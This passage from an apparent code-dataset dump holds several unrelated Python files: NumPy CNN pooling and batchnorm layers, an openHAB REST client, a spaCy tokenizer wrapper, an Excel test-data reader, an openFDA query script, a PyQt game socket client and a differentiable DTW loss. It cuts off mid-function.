                loc = np.unravel_index(i, outshape)
                dy_val = dy[loc]
                ddat[slices] += dy_val*kernel
                dkernel += dy_val*dat[slices]

            if pad:
                ddat = ddat[:, pad:-pad, pad:-pad]

            dx_kernel[nd] = ddat[:]
        dw[nk:nk+1] = dkernel
        dx += dx_kernel

    return dx, dw, db


def max_pool(x, pool_shape, stride, pooling_axes, backprop=False, dout=None):
    """ Pool the values of an ndarray, by taking the max over a specified pooling
    filter volume that rasters across the specified axes of x with a given stride.

    A backprop flag can be toggled to, instead, perform back-propagation through the
    maxpool layer (i.e. pass gradient values through to the array elements that
    contributed to the forward pooling).

    Parameters
    ----------
    x : numpy.ndarray
        Input array to be pooled.
    pool_shape : Iterable[int, ...]
        Shape of the pooling filter along each specified pooling axis, listed
        in ascending axis order. No entries are provided for non-pooling axes.
    stride : int ( > 0)
        Step size used while rastering the pooling filter across x.
    pooling_axes : Union[int, Iterable[int, ...]]
        The axes along which the values of x will be max-pooled.
    backprop : bool, optional
        Indicates whether or not max_pool performs back propagation
        instead of pooling.
    dout : Union[NoneType, numpy.ndarray]
        "Upstream" array, whose values will be back propagated through
        the max-pool layer. This must be specified if backprop is True.

    Returns
    -------
    if backprop is False
        out : numpy.ndarray
            An array of the max-pooled values of x.

    if backprop is True
        dx : numpy.ndarray (shape=x.shape)
            An array of values from dout back-propagated through the pooling layer.
    """
    if type(pooling_axes) is int:
        pooling_axes = (pooling_axes,)  # note the comma: a 1-tuple, not a parenthesized int
    pooling_axes = tuple(sorted(pooling_axes))

    pool_only_slice = tuple(slice(None, None) if i in pooling_axes else 0 for i in range(x.ndim))
    outshape = get_outshape(x[pool_only_slice].shape, pool_shape, stride)

    if backprop:
        assert dout is not None, "dout must be provided during backprop"
        mask_view = tuple(np.newaxis if i in pooling_axes else slice(None, None) for i in range(x.ndim))
        dx = np.zeros_like(x, dtype=x.dtype)

    else:
        tmp_shape = list(x.shape)
        for i, ax in enumerate(pooling_axes):
            tmp_shape[ax] = outshape[i]
        out = np.zeros(tmp_shape, dtype=x.dtype)

    all_slices = [slice(None, None) for i in range(x.ndim)]

    # iterate over positions to place the pooling filter
    for i, pos in enumerate(product(*[stride*np.arange(i) for i in outshape])):

        slices = all_slices[:]
        # generate slices to make pooling filter views of x
        for j, start in enumerate(pos):
            slices[pooling_axes[j]] = slice(start, start + pool_shape[j])
        slices = tuple(slices)

        # generate the indices of the output array to update
        inds = np.unravel_index(i, outshape)
        loc = all_slices[:]
        for cnt, ax in enumerate(pooling_axes):
            loc[ax] = inds[cnt]
        loc = tuple(loc)

        maxes = np.amax(x[slices], axis=pooling_axes)

        if not backprop:
            out[loc] = maxes
        else:
            dx[slices][np.where(x[slices] == maxes[mask_view])] = dout[loc].flat

    if not backprop:
        return out
    else:
        return dx
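
# A tiny worked example (added for illustration): 2x2 max pooling with
# stride 2 over a single 4x4 feature map.
def _example_max_pool():
    x = np.arange(16, dtype=float).reshape(1, 1, 4, 4)
    out = max_pool(x, (2, 2), 2, (2, 3))
    # Each 2x2 window keeps its maximum value.
    assert np.array_equal(out[0, 0], np.array([[5., 7.], [13., 15.]]))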

def max_pool_forward_naive(x, pool_param):
    """
    A naive implementation of the forward pass for a max pooling layer.

    Inputs:
    - x: Input data, of shape (N, C, H, W)
    - pool_param: dictionary with the following keys:
      - 'pool_height': The height of each pooling region
      - 'pool_width': The width of each pooling region
      - 'stride': The distance between adjacent pooling regions

    Returns a tuple of:
    - out: Output data
    - cache: (x, pool_param)
    """
    pool_shape = (pool_param['pool_height'], pool_param['pool_width'])
    cache = (x, pool_param)
    return max_pool(x, pool_shape, pool_param['stride'], (2, 3)), cache


def max_pool_backward_naive(dout, cache):
    """
    A naive implementation of the backward pass for a max pooling layer.

    Inputs:
    - dout: Upstream derivatives
    - cache: A tuple of (x, pool_param) as in the forward pass.

    Returns:
    - dx: Gradient with respect to x
    """
    x, pool_param = cache
    pool_shape = (pool_param['pool_height'], pool_param['pool_width'])
    return max_pool(x, pool_shape, pool_param['stride'], (2, 3), backprop=True, dout=dout)


def spatial_batchnorm_forward(x, gamma, beta, bn_param):
    """
    Computes the forward pass for spatial batch normalization.

    Inputs:
    - x: Input data of shape (N, C, H, W)
    - gamma: Scale parameter, of shape (C,)
    - beta: Shift parameter, of shape (C,)
    - bn_param: Dictionary with the following keys:
      - mode: 'train' or 'test'; required
      - eps: Constant for numeric stability
      - momentum: Constant for running mean / variance. momentum=0 means that
        old information is discarded completely at every time step, while
        momentum=1 means that new information is never incorporated. The
        default of momentum=0.9 should work well in most situations.
      - running_mean: Array of shape (C,) giving running mean of features
      - running_var: Array of shape (C,) giving running variance of features

    Returns a tuple of:
    - out: Output data, of shape (N, C, H, W)
    - cache: Values needed for the backward pass
    """
    N, C, H, W = x.shape

    # Spatial batchnorm is vanilla batchnorm applied per channel: move the
    # channel axis last so each channel is normalized over all N*H*W values.
    # (A plain x.reshape(-1, C) would mix values from different channels.)
    x_flat = x.transpose(0, 2, 3, 1).reshape(-1, C)
    out, cache = batchnorm_forward(x_flat, gamma, beta, bn_param)
    out = out.reshape(N, H, W, C).transpose(0, 3, 1, 2)

    return out, cache


def spatial_batchnorm_backward(dout, cache):
    """
    Computes the backward pass for spatial batch normalization.

    Inputs:
    - dout: Upstream derivatives, of shape (N, C, H, W)
    - cache: Values from the forward pass

    Returns a tuple of:
    - dx: Gradient with respect to inputs, of shape (N, C, H, W)
    - dgamma: Gradient with respect to scale parameter, of shape (C,)
    - dbeta: Gradient with respect to shift parameter, of shape (C,)
    """
    N, C, H, W = dout.shape

    # Undo the same channel-last flattening used in the forward pass.
    dout_flat = dout.transpose(0, 2, 3, 1).reshape(-1, C)
    dx, dgamma, dbeta = batchnorm_backward_alt(dout_flat, cache)
    dx = dx.reshape(N, H, W, C).transpose(0, 3, 1, 2)

    return dx, dgamma, dbeta
327, "usage_type": "name"}, {"api_name": "numpy.fromiter", "line_number": 335, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 342, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 346, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 346, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.fromiter", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.rint", "line_number": 383, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 475, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 476, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 477, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 482, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 483, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 484, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 487, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 487, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 494, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 495, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 498, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 500, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 501, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 504, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 565, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 566, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 572, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 577, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 577, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 586, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 591, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 596, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 730, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 731, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 731, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 732, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 733, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 734, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 735, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 737, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 756, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 756, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 757, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 759, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 759, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 759, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 761, "usage_type": "call"}]}
+{"seq_id": "1144281", "text": "import requests\nimport base64\nclass OpenHab:\n\n def __init__(self): \n self.openhab_host = \"localhost\"\n self.openhab_port = \"8080\"\n\n def post_command(self, key, value):\n print(\"appel de post_command(\" + key +\",\"+ value +\")\")\n \"\"\" Post a command to OpenHAB - key is item, value is command \"\"\"\n url = 'http://%s:%s/rest/items/%s'%(self.openhab_host,\n self.openhab_port, key)\n try:\n req = requests.post(url, data=value,\n headers=self.basic_header())\n except requests.ConnectionError:\n print (\" Erreur dans l'adressage du serveur openHab\")\n\n def put_status(self, key, value):\n \"\"\" Put a status update to OpenHAB key is item, value is state \"\"\"\n url = 'http://%s:%s/rest/items/%s/state'%(self.openhab_host,\n self.openhab_port, key)\n req = requests.put(url, data=value, headers=self.basic_header())\n if req.status_code != requests.codes.ok:\n req.raise_for_status()\n\n def get_status(self, name):\n \"\"\" Request updates for any item in group NAME from OpenHAB.\n Long-polling will not respond until item updates.\n \"\"\"\n # When an item in Group NAME changes we will get all items in the group \n # and need to determine which has changed\n url = 'http://%s:%s/rest/items/%s'%(self.openhab_host,\n self.openhab_port, name)\n payload = {'type': 'json'}\n try:\n req = requests.get(url, params=payload,\n headers=self.polling_header())\n if req.status_code != requests.codes.ok:\n req.raise_for_status()\n # Try to parse JSON response\n # At top level, there is type, name, state, link and members array\n members = req.json()[\"members\"]\n for member in members:\n # Each member has a type, name, state and link\n name = member[\"name\"]\n state = member[\"state\"]\n do_publish = True\n # Pub unless we had key before and it hasn't changed\n if name in self.prev_state_dict:\n if self.prev_state_dict[name] == state:\n do_publish = False\n self.prev_state_dict[name] = state\n if do_publish:\n self.publish(name, state)\n except:\n print(\"error located in openhab.py\")\n\n def basic_header(self):\n \"\"\" Header for OpenHAB REST request - standard \"\"\"\n \"\"\"self.auth = base64.encodestring('%s:%s'\n %(self.username, self.password)\n ).replace('\\n', '')\"\"\"\n return {\n #\"Authorization\" : \"Basic %s\" %self.auth,\n \"Content-type\": \"text/plain\"}\n\n\n", "sub_path": "openhab.py", "file_name": "openhab.py", "file_ext": "py", "file_size_in_byte": 2933, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.post", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.ConnectionError", "line_number": 17, "usage_type": "attribute"}, {"api_name": "requests.put", "line_number": 24, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 25, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 38, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 40, "usage_type": "attribute"}]}
+{"seq_id": "593230159", "text": "\"\"\"\nThe wrapper over the spaCy's Tokenizer for `English`,`German`,`Spanish`,`Portuguese`,`French`,`Italian`, and `Dutch`.\n Based on the library's documentation website, the tokenization algorithm can be summarized as follows:\n 1. Iterate over space-separated substrings\n 2. Check whether we have an explicitly defined rule for this substring. If we do, use it.\n 3. Otherwise, try to consume a prefix.\n 4. If we consumed a prefix, go back to the beginning of the loop, so that special-cases always get priority.\n 5. If we didn't consume a prefix, try to consume a suffix.\n 6. If we can't consume a prefix or suffix, look for \"infixes\" — stuff like hyphens etc.\n 7. Once we can't consume any more of the string, handle it as a single token.\nFor more info regarding the tokenizer please see the \"Tokenization\" part of https://spacy.io/usage/linguistic-features\nA valid use case of the tokenizer wrapper class could be:\n SpaCyTokenizer().tokenize(\"This is a test\", LanguageIdentifier.en)\n\"\"\"\nfrom typing import List\n\nimport spacy\n\nfrom translate.readers.constants import LanguageIdentifier as LId\n\n__author__ = \"Hassan S. Shavarani\"\n\n\nclass SpaCyTokenizer:\n def __init__(self):\n \"\"\"\n The tokenizer performs lazy instantiation of the models. You don't need multiple instances of this class for\n tokenization of sentences from different languages.\n \"\"\"\n self._models = {}\n self._supported_languages = [LId.en, LId.de, LId.es, LId.pt, LId.fr, LId.it, LId.nl]\n\n def tokenize(self, text: str, lang_identifier: LId, lower_case: bool = False) -> List[str]:\n \"\"\"\n :param text: the string to be tokenized\n :param lang_identifier: one of the langugage values defined in `translate.readers.constants.LanguageIdentifier`\n :param lower_case: the flag indicating whether the resulting tokens need to be lower-cased or not.\n :return: the list of tokenized strings\n \"\"\"\n if lang_identifier not in self._supported_languages:\n raise ValueError(\"SpaCyTokenizer cannot tokenize utterances in \\\"{}\\\"\".format(lang_identifier.name))\n if lang_identifier not in self._models:\n try:\n self._models[lang_identifier] = spacy.load(lang_identifier.name)\n except OSError:\n raise EnvironmentError(\"The spaCy resources for \\\"{0}\\\" might not be installed correctly, please try \"\n \"running the following command in your comman-line before running this project\\n\"\n \"python -m spacy download {0}\".format(lang_identifier.name))\n tokenized_document = self._models[lang_identifier].tokenizer(text)\n if lower_case:\n return [token.text.lower() for token in tokenized_document]\n else:\n return [token.text for token in tokenized_document]\n", "sub_path": "src/translate/readers/tokenizer.py", "file_name": "tokenizer.py", "file_ext": "py", "file_size_in_byte": 2903, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "translate.readers.constants.LanguageIdentifier.en", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier", "line_number": 31, "usage_type": "name"}, {"api_name": "translate.readers.constants.LanguageIdentifier.de", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.es", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.pt", "line_number": 31, "usage_type": "attribute"}, {"api_name": 
"translate.readers.constants.LanguageIdentifier.fr", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.it", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.nl", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier", "line_number": 33, "usage_type": "name"}, {"api_name": "spacy.load", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 33, "usage_type": "name"}]}
+{"seq_id": "549646007", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2020/6/3 11:10\n@Author : WangHuan\n@Contact : hi_chengzi@126.com\n@File : data.py\n@Software: PyCharm\n@description: 读取excel中的数据方便testcase直接使用\n\"\"\"\n\nimport os\nimport json\nimport xlrd\n\n\nclass ReadData(object):\n\n def __init__(self, filename):\n scr_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n data_path = os.path.join(scr_path, \"data\", filename)\n data_open = xlrd.open_workbook(data_path)\n self.data_excel = data_open.sheet_by_index(0)\n\n def get_url(self):\n '''\n 获取请求的url\n :return:\n '''\n url = self.data_excel.cell(1, 3).value\n return url\n\n def get_method(self, case_name):\n '''\n 获取请求类型\n :param case_name:\n :return:\n '''\n return self.get_case(case_name=case_name)[4]\n\n def get_data(self, case_name):\n '''\n 获取请求数据,转化为字典格式\n :param case_name:\n :return:\n '''\n return json.loads(self.get_case(case_name)[6])\n\n def get_expect(self, case_name):\n '''\n 期望结果\n :param case_name:\n :return:\n '''\n return self.get_case(case_name)[7]\n\n def get_case(self, case_name):\n '''\n 根据case_name找到对应用例行\n :param case_name:\n :return: 用例所在行\n '''\n\n for i in range(1, self.data_excel.nrows):\n if self.data_excel.cell(i, 1).value == case_name:\n return self.data_excel.row_values(i)\n\n print(\"用例名称未找到\")\n return None\n\n\nif __name__ == '__main__':\n data = ReadData(\"test_login_data.xlsx\")\n url = data.get_url()\n method = data.get_method(\"test_login_normal\")\n json = data.get_data(\"test_login_normal\")\n expect = data.get_expect(\"test_login_normal\")\n print(url, method)\n print(type(json))\n print(json)\n print(expect)\n", "sub_path": "interface/src/common/data.py", "file_name": "data.py", "file_ext": "py", "file_size_in_byte": 2006, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.dirname", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "xlrd.open_workbook", "line_number": 22, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "411078685", "text": "# Importamos los módulos y bibliotecas necesarios para realizar este programa\nimport http.client\nimport json\n\n# Empleamos un código que utiliza la biblioteca http.client que hemos importado para leer repositorios\nheaders = {'User-Agent': 'http-client'}\nconn = http.client.HTTPSConnection(\"api.fda.gov\")\nconn.request(\"GET\", \"/drug/label.json?limit=10\", None, headers) # Con limit=10 encontraremos 10 medicamentos distintos\nr1 = conn.getresponse()\nprint(r1.status, r1.reason)\nrepos_raw = r1.read().decode(\"utf-8\")\nconn.close()\ninformacion = json.loads(repos_raw)\n\n# sabemos que en la página a la que accedemos el contenido es json y json se encuentra en forma de diccionario por tanto utilizamos las funciones de un diccionario para encontrar los diferentes elementos\nmedicamento_info=informacion[\"results\"]\n\n# Indexamos entre los distintos elementos de la página para imprimir los diez que hay en ella\nfor i in range(len(medicamento_info)):\n info = medicamento_info[i]\n print(\"Id del medicamento:\",info[\"id\"])\n", "sub_path": "openfda-1/Programa 2.py", "file_name": "Programa 2.py", "file_ext": "py", "file_size_in_byte": 1019, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "http.client.client.HTTPSConnection", "line_number": 7, "usage_type": "call"}, {"api_name": "http.client.client", "line_number": 7, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 7, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "152187708", "text": "from PyQt5.QtCore import QThread, pyqtSignal\nimport socket\nimport errno\n\n\nclass ClientThread(QThread):\n oppo = pyqtSignal(str)\n rply = pyqtSignal(str)\n error = pyqtSignal(str)\n rematch = pyqtSignal(str)\n draw = pyqtSignal(str)\n\n def __init__(self, username, ip, parent=None):\n super(ClientThread, self).__init__(parent)\n self.username = username\n self.ip = ip\n\n def run(self):\n rcv = False\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n self.s.connect((self.ip, 1234))\n self.s.sendall(bytes(self.username, 'utf-8'))\n except ConnectionRefusedError as e:\n self.error.emit(\"nTarget Refused to Connect\")\n\n try:\n while True:\n msg = self.s.recv(10)\n msg = msg.decode('utf-8')\n\n if not rcv:\n self.oppo.emit(msg)\n rcv = True\n\n elif msg == \"D\":\n self.draw.emit(msg)\n\n elif msg == \"R\":\n self.rematch.emit(msg)\n\n else:\n self.rply.emit(msg)\n\n except IOError as e:\n if e.errno != errno.EAGAIN and e.errno != errno.EWOULDBLOCK:\n if rcv:\n self.error.emit(\"yOpponent Disconnected\")\n\n except Exception as e:\n self.error.emit('yUnknown Error: {}'.format(str(e)))\n\n def send(self, data):\n self.s.sendall(bytes(data, \"utf-8\"))\n", "sub_path": "Client.py", "file_name": "Client.py", "file_ext": "py", "file_size_in_byte": 1513, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtCore.QThread", "line_number": 6, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 7, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 8, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 9, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 10, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 11, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 20, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 20, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 20, "usage_type": "attribute"}, {"api_name": "errno.EAGAIN", "line_number": 46, "usage_type": "attribute"}, {"api_name": "errno.EWOULDBLOCK", "line_number": 46, "usage_type": "attribute"}]}
+{"seq_id": "306234088", "text": "# Macros and libararies\nfrom math import isinf\nfrom numpy import array, zeros, full, argmin, inf, ndim\nimport numpy as np\nimport torch as T\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef _traceback(D):\n i, j = array(D.shape) - 2\n p, q = [i], [j]\n while (i > 0) or (j > 0):\n tb = argmin((D[i, j], D[i, j + 1], D[i + 1, j]))\n if tb == 0:\n i -= 1\n j -= 1\n elif tb == 1:\n i -= 1\n else: # (tb == 2):\n j -= 1\n p.insert(0, i)\n q.insert(0, j)\n return array(p), array(q)\n\ndef dtw(x, y, dist, warp=1, w=inf, s=1.0):\n \"\"\"\n Computes Dynamic Time Warping (DTW) of two sequences.\n :param array x: N1*M array\n :param array y: N2*M array\n :param func dist: distance used as cost measure\n :param int warp: how many shifts are computed.\n :param int w: window size limiting the maximal distance between indices of matched entries |i,j|.\n :param float s: weight applied on off-diagonal moves of the path. As s gets larger, the warping path is increasingly biased towards the diagonal\n Returns the minimum distance, the cost matrix, the accumulated cost matrix, and the wrap path.\n \"\"\"\n assert len(x)\n assert len(y)\n assert isinf(w) or (w >= abs(len(x) - len(y)))\n assert s > 0\n r, c = len(x), len(y)\n if not isinf(w):\n D0 = full((r + 1, c + 1), inf)\n for i in range(1, r + 1):\n D0[i, max(1, i - w):min(c + 1, i + w + 1)] = 0\n D0[0, 0] = 0\n else:\n D0 = zeros((r + 1, c + 1))\n D0[0, 1:] = inf\n D0[1:, 0] = inf\n D1 = D0[1:, 1:] # view\n for i in range(r):\n for j in range(c):\n if (isinf(w) or (max(0, i - w) <= j <= min(c, i + w))):\n D1[i, j] = dist(x[i], y[j])\n C = D1.copy()\n jrange = range(c)\n for i in range(r):\n if not isinf(w):\n jrange = range(max(0, i - w), min(c, i + w + 1))\n for j in jrange:\n min_list = [D0[i, j]]\n for k in range(1, warp + 1):\n i_k = min(i+k, r)\n j_k = min(j+k, c)\n min_list += [D0[i_k, j] * s, D0[i, j_k] * s]\n D1[i, j] += min(min_list)\n if len(x) == 1:\n path = zeros(len(y)), range(len(y))\n elif len(y) == 1:\n path = range(len(x)), zeros(len(x))\n else:\n path = _traceback(D0)\n return D1[-1, -1], C, D1, path\n\n\n\n# We define two sequences x, y as numpy array\n# where y is actually a sub-sequence from x\nx = np.array([2, 0, 1, 1, 2, 4, 2, 1, 2, 0]).reshape(-1, 1)\ny = np.array([1, 1, 2, 4, 2, 1, 2, 0]).reshape(-1, 1)\n\n\neuclidean_norm = lambda x, y: np.abs(x - y)\n\nd, cost_matrix, acc_cost_matrix, path = dtw(x, y, dist=euclidean_norm)\n\n\n# You can also visualise the accumulated cost and the shortest path\nimport matplotlib.pyplot as plt\n\nplt.imshow(acc_cost_matrix.T, origin='lower', cmap='gray', interpolation='nearest')\nplt.plot(path[0], path[1], 'w')\n#plt.show()\n\n\n\n\n# this cannot handle inf, -\\rho * x too big, e^{- \\rho * x} close to 0\ndef smooth_min(x, rho=10):\n eps = 1e-12\n val = -1/rho * T.log(T.mean(T.exp(x * (-rho))) + eps)\n assert val!=float('inf'), T.mean(T.exp(x * (-rho)))\n return val\n\nrho = 10\nx = T.tensor([100.0, 2.0231, 100.0])\nprint (smooth_min(x,rho))\n\n\n# 1d min func is 1\n\n\n# this will serve as a loss function\ndef _traceback(D):\n i, j = array(D.shape) - 2\n p, q = [i], [j]\n while (i > 0) or (j > 0):\n tb = argmin((D[i, j], D[i, j + 1], D[i + 1, j]))\n if tb == 0:\n i -= 1\n j -= 1\n elif tb == 1:\n i -= 1\n else: # (tb == 2):\n j -= 1\n p.insert(0, i)\n q.insert(0, j)\n return array(p), array(q)\n\n\ndef diff_dtw_loss(x, y, dist, warp=1, w=inf, s=1.0, rho=40):\n \"\"\" differentiable dtw, takes two sequences and\n compute the distance under the 
given metric\n    x and y are tensors of shape seq_len x dim\n    dist is a bi-variate function\n    \"\"\"\n\n    assert x.shape[0]\n    assert y.shape[0]\n    assert isinf(w) or (w >= abs(len(x) - len(y)))\n    assert s > 0\n\n    MAX_VAL = 1e2\n\n    r, c = x.shape[0], y.shape[0]\n    if not isinf(w):\n        D0 = T.full((r + 1, c + 1), MAX_VAL)\n        for i in range(1, r + 1):\n            D0[i, max(1, i - w):min(c + 1, i + w + 1)] = 0\n        D0[0, 0] = 0\n    else:\n        D0 = T.zeros(r + 1, c + 1)\n        D0[0, 1:] = MAX_VAL\n        D0[1:, 0] = MAX_VAL\n    D1 = D0[1:, 1:]  # view\n    for i in range(r):\n        for j in range(c):\n            #print(\"dtw size\", x.size(), y.size())\n            if (isinf(w) or (max(0, i - w) <= j <= min(c, i + w))):\n                D1[i, j] = dist(x[i], y[j])\n    C = D1.clone()\n    jrange = range(c)\n    for i in range(r):\n        if not isinf(w):\n            jrange = range(max(0, i - w), min(c, i + w + 1))\n        for j in jrange:\n            min_list = D0[i, j]\n            for k in range(1, warp + 1):\n                # print(i+k, r)\n                i_k = min(i + k, r)\n                j_k = min(j + k, c)\n                min_list = T.cat((T.tensor([min_list], requires_grad=True), \\\n                                  T.tensor([D0[i_k, j] * s], requires_grad=True), \\\n                                  T.tensor([D0[i, j_k] * s], requires_grad=True)))\n                # Softmin is NOT a smooth min function\n                min_val = smooth_min(min_list, rho)\n                # print('min:', i, j, min_val, min_list)\n                D1[i, j] = D1[i, j] + min_val\n    if len(x) == 1:\n        path = zeros(len(y)), range(len(y))\n    elif len(y) == 1:\n        path = range(len(x)), zeros(len(x))\n    else:\n        path = _traceback(D0)\n    return D1[-1, -1], C, D1, path\n\n\n\nx = np.array([2, 0, 1, 1, 2, 4, 2, 1, 2, 0], dtype=np.float32).reshape(-1, 1)\ny = np.array([1, 1, 2, 4, 2, 1, 2, 0], dtype=np.float32).reshape(-1, 1)\n\n\ntensor_x = T.tensor(T.from_numpy(x), requires_grad=True)\ntensor_y = T.tensor(T.from_numpy(y), requires_grad=True)\n\n\neuclidean_norm = lambda x, y: T.abs(x - y)\n\n#diff_d, diff_cost_matrix, diff_acc_cost_matrix, diff_path = diff_dtw_loss(tensor_x, tensor_y, dist=euclidean_norm)\n\n#print('distance', diff_d, 'diff distance:', diff_d.detach().numpy())\n#diff_acc_cost_matrix = diff_acc_cost_matrix.detach().numpy()\n# print(acc_cost_matrix)\n\n\n# You can also visualise the accumulated cost and the shortest path\nimport matplotlib.pyplot as plt\n\n#fig, (ax1, ax2) = plt.subplots(1, 2)\n#fig.suptitle('Original and Differentiable Accumulated Cost Matrix')\n#ax1.imshow(acc_cost_matrix.T, origin='lower', cmap='gray', interpolation='nearest')\n#ax1.plot(path[0], path[1], 'w')\n#ax2.imshow(diff_acc_cost_matrix.T, origin='lower', cmap='gray', interpolation='nearest')\n#ax2.plot(diff_path[0], diff_path[1], 'w')\n\n\n# plt.imshow(acc_cost_matrix.T, origin='lower', cmap='gray', interpolation='nearest')\n# plt.plot(path[0], path[1], 'w')\n# plt.show()\n\n\nimport torch as T\nfrom torch.nn import functional as F\n\nfrom torch.nn.modules import Module\n\nclass _Loss(Module):\n    def __init__(self, size_average=None, reduce=None, reduction='mean', _Reduction=None):\n        super(_Loss, self).__init__()\n        if size_average is not None or reduce is not None:\n            self.reduction = _Reduction.legacy_get_string(size_average, reduce)\n        else:\n            self.reduction = reduction\n\n\nclass DTW_Loss(_Loss):\n    def __init__(self, rho=10, size_average=None, reduce=None, reduction='mean'):\n        super(DTW_Loss, self).__init__(size_average, reduce, reduction)\n        self.rho = rho\n\n    def forward(self, output, target):\n        # batch x seq_len x dim\n        if ndim(output)==3:\n            dist = []\n            for b in range(output.size(0)):\n                #print(\"sizes\", output.size(), target.size())\n                d_b, cost_matrix, diff_acc_cost_matrix, diff_path = diff_dtw_loss(output[b], target[b], dist=euclidean_norm, 
